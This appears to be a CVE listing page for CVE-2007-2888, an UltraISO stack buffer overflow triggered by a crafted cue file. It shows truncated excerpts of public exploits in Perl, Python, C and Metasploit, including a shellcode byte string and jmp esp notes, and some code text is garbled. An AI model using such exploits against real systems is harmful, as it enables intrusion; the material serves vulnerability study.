CVE-2007-2888

#!/usr/bin/perl ############################################################ #Credit:To n00b for finding this bug and writing poc ############################################################ #Ultra ISO stack over flow poc code #Ultra iso is exploitable via opening #a specially crafted Cue fileThere is #A limitation that the user must have the ...

# #ultra iso exploit #thomas pollet @ gmail com # import struct scode=(#metasploit calcexe shellcode "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\ ...

/* Date : May 28th 2007 UltraISO <= 8622011 local buffer-over flow by n00b You might need to change the jmp esp% adress to your version Tested on win xp service pack 2 <eng> executes calcDon't forget you need to have the bin and cue file in the same Directory special thanks to Thomas Pollet also */ #include <stdlibh> #incl ...

## # $Id: ultraiso_cuerb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Met ...